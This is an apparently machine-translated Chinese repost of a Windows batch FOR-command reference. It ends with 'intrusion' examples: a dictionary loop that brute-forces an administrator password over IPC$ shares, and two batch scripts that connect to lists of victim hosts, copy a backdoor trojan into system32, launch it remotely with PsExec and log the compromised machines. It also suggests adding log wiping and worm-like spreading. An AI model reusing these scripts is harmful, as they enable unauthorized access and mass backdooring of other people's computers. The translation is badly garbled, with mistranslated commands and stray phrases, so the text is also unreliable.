最近大家都在讨论windows批处理命令大全_DOS批处理命令大全_2相关的事情，对此小编也是非常的感应兴趣，那么这件事具体又是怎么回事呢？下面就是小编搜索到的关于windows批处理命令大全_DOS批处理命令大全_2事件的相关信息，我们一起来看看吧！

如果返回代码等于指定的数字，则条件满足，命令运行；否则下一句就是跑。

(资料图片仅供参考)

例如，如果错误级别2转到x2

当一个DOS程序运行时，它会返回一个数字给DOS，这个数字叫做errorlevel或返回码。常见的返回代码是0和1。

10 .对于命令

for命令是一个复杂的命令，主要用于在指定的范围内循环执行带有参数的命令。

在批处理文件中使用FOR命令时，请使用%%variable来指定变量。

for { % variable | % % variable } in(set)do命令[ CommandLineOptions]

%variable指定一个单字母可替换参数。

(set)指定一个或一组文件。可以使用通配符。

Command指定要对每个文件执行的命令。

Command-parameters为特定命令指定参数或命令行开关。

在批处理文件中使用FOR命令时，请使用%%variable来指定变量。

而不是使用%variable。变量名区分大小写，所以%i不同于% i。

如果启用了命令扩展，以下附加的FOR命令格式将受

支持：

FOR/D %变量IN (set) DO命令[命令-参数]

如果集合包含通配符，则指定它匹配目录名而不是文件。

名字匹配。

FOR/R[[drive:]path]% variable IN(set)DO command[command-

检查以[drive:]path为根的目录树，指向

FOR语句。如果在/R后没有指定目录，则使用当前目录。

目录。如果集合只是一个点(。)字符，枚举目录树。

FOR/L %变量IN (start，step，end) DO命令[command-para

这个集合表示从开始到结束递增的一系列数字。

因此，(1，1，5)将产生序列1 2 3 4 5，而(5，1，1)将产生

顺序(5 4 3 2 1)。

(file-set) DO命令中的FOR/F[" options "]%变量

FOR/F[" options "]%变量IN ("string") DO命令

FOR/F[" options "]%变量在(command) DO命令中

或者，如果有usebackq选项：

(file-set) DO命令中的FOR/F[" options "]%变量

FOR/F[" options "]%变量IN ("string") DO命令

FOR/F[" options "]%变量在(command) DO命令中

Filenameset是一个或多个文件名。转到文件名集中的。

在下一个文件之前，每个文件都已被打开、读取和处理。

包括处理所读取文件，将其分成文本行，然后划分每行

解析零个或多个符号。然后使用找到的符号串变量值。

调用For循环。默认情况下，/F在每个文件的每一行都是分开的。

的第一个空白符号。跳过空行。您可以指定可选的“选项”

参数重写默认的解析操作。这个引用的字符串由一个或多个

为不同的解析选项指定关键字。这些关键字是：

eol=c-表示行注释字符的结束(只有一个)

skip=n-表示在文件开头忽略的行数。

delims=XXX-表示分隔符集。这个键代替了空格和tab键。

默认分隔符集。

Tokens=x，y，m-n-指的是每行的哪个符号被传递给每次迭代

为了自己。这将导致额外的变量名。

格式是一个范围。m由第n个符号指定。

符号中的最后一个字符，星号，

那么额外的变量将在最后一个符号处被解析。

并接受该行的保留文本。

usebackq-指定新语法已用于以下情况：

将引号后的字符串作为命令执行，并

引号字符是文字字符串命令，在fi中是允许的

使用双引号来扩展文件名。

样本1:

FOR/F " eol=；tokens=2，3* delims=，" %i in (myfile.txt) do命令

将分析myfile.txt中的每一行，忽略那些以分号开头的行，并将

每行中的第二个和第三个符号被传递给for程序体；使用逗号和/或

空格分隔符号。请注意，这个for程序体的语句指的是% i。

获取第二个符号，参考%j获取第三个符号，参考% k。

获取第三个符号之后的所有剩余符号。对于带空格的文件

名称，需要用双引号将文件名括起来。为了以这种方式制造

对于双引号，您还需要使用usebackq选项，否则，双引号将

被理解为用于定义待分析的字符串。

%i在for语句中指定，%j和%k由指定

Tokens=选项有明确的解释。可以用tokens=一行。

指定最多26个符号，只要你不试图解释一个高于字母Z或

Z的变量.记住FOR变量是单字母的，区分大小写的，是全局的；

同时使用的不能超过52个。

还可以对相邻字符串使用FOR /F解析逻辑；该方法是，

用单引号将filenameset括在括号中。这样，人物

该字符串将被视为文件中的单个输入行。

最后，您可以使用FOR /F命令来分析该命令的输出。方法是设置

方括号之间的文件名集成为一个解构的字符串。该线将

作为命令行，它被传递给子CMD.EXE，其输出将被捕获。

内存中，并作为一个文件进行分析。因此，下面举几个例子：

FOR/F " usebackq delims==" % I IN(` set `)DO @ echo % I

枚举当前环境中的环境变量的名称。

此外，还增强了对变量引用的替换。您现在可以使用以下内容

选项语法：

~ I-删除所有引号(")并展开% i。

% ~ fI-将%I展开为完全限定的路径名。

%~dI-only %I扩展为一个驱动器号。

% ~ pI-仅%I扩展到一个路径。

%~nI-only %I被扩展为文件名。

% ~ Xi-将%I扩展为仅一个文件扩展名

% ~ sI-扩展路径只包含短名称。

% ~ aI-将%I扩展到文件的file属性。

% ~ tI——将%I扩展到文件的日期/时间。

% ~ zI-将%I扩展到文件大小

% ~ $ PATH:I-找到PATH环境变量中列出的目录并展开% i。

找到的第一个完全限定名。如果环境变量

未定义，或者找不到该文件，则将扩展该组合键。

空行

修改器可以组合起来获得多种结果：

% ~仅dpI % I扩展为一个驱动器号和路径。

%~nxI-only %I被扩展为文件名和扩展名。

% ~仅fsI % I扩展为带有短名称的完整路径名。

% ~ DP $ PATH:I-找到PATH环境变量中列出的目录并展开% i。

找到的第一个驱动器号和路径。

% ~ ftzaI-将%I扩展到类似输出行的DIR

在上面的例子中，%I和PATH可以替换为其他有效值。% ~语法

以有效的FOR变量名结束。选择一个大写的变量名，如% i。

不区分大小写的组合键易于阅读并避免混淆。

以上是MS的官方帮助，下面举几个例子来说明入侵中For命令的使用。

样本2:

使用For命令实现对目标Win2k主机的暴力密码释放。

我们使用net use \ IPI PC $ " password "/u:" administrator "来尝试连接目标主机，并在成功时记下密码。

最重要的命令是一个：for/f I % in(dict . txt)do net use \ IPI PC $ " I % "/u:" administrator "

I%用于表示admin的密码。在dict.txt中，i%的这个值是与net use命令连接的。然后将程序的运行结果传递给find命令-

for/f I % % in(dict . txt)do net use \ IPI PC $ " I % % "/u:" administrator " | find ":命令成功完成" D:ok.txt，所以被ko。

样本3:

你有没有过大批肉鸡等着你种后门木马的经历？量特别大的时候，原本很开心的事情都会变得很压抑：)。在文章的开始，我们谈到了使用批处理文件，它可以简化日常或重复性的任务。那么如何实现呢？哈哈，你看下去就知道了。

只有一个主命令：(在批处理文件中使用FOR命令时，指定的变量使用%%variable)

@for /f "tokens=1，2，3 delims=" %%i in (victim.txt) do开始呼叫door.bat %%i %%j %%k

tokens的用法请参考上面的sample1，这里的意思是将victim.txt的内容按顺序传递给door.bat中的参数%i %j %k。

而cultivate.bat无非是利用net use命令建立IPC$连接，并将木马后门复制到受害者，然后利用返回代码(IfErrorEver=)筛选成功植入后门的主机，并回显出来，或者回显到指定文件。

delims=表示vivtim.txt中的内容是一空格来分隔的。我想看到这里你也一定明白这受害者。文本文件（textfile）里的内容是什么样的了。应该根据%%i %%j %%k表示的对象来排列，一般就是互联网协议（Internet Protocol的缩写）密码用户名。

代码雏形：

-在这里剪切，然后保存为批处理文件（我称之为main.bat ) -

@关闭回声

@if "%1"==" "转到用法

@for /f "tokens=1，2，3 delims=" % % I in(victim。txt)开始呼叫ipchack。bat % % I % % j % % k

@转到结尾

：用法

@回声在磁盘操作系统模式下运行该批处理。或者双击它。

：结束

-在这里剪切，然后保存为批处理文件（我称之为main.bat ) -

-在这里剪切，然后保存为批处理文件（我称之为door.bat)

@net use \%1ipc$ %3 /u:"%2 "

@如果错误级别1转到失败

@回声正在尝试建立工业程序控制（ industrial process control的缩写）连接………好的

@如果没有错误，复制windrv32.exe\dmin$system32级别一回显IP %1用户%2 PWD %3 ko.txt

@ p * * * EC \ % 1c:win nt system 32 wind RV 32。可执行程序的扩展名

@ p * * * EC \ % 1 net start windrv 32 if not错误级别1 echo % 1后门ed ko。文本文件（textfile）

：失败

@回声抱歉无法连接到受害者。

-在这里剪切，然后保存为批处理文件（我称之为door.bat)

这只是一个自动种植后门批处理的雏形，两个批处理和后门程序(Windrv32.exe)，PSexec.exe需放在统一目录下。批处理内容

尚可扩展，例如：加入清除日志军械服务局副局长军火服务司副司长的功能，加入定时添加用户的功能，更深入一点可以使之具备自动传播功能（蠕虫).此处不多做叙述，有兴趣的朋友可自行研究。

本文到此结束，希望对大家有所帮助。

标签： 批处理文件 环境变量 返回代码 文本文件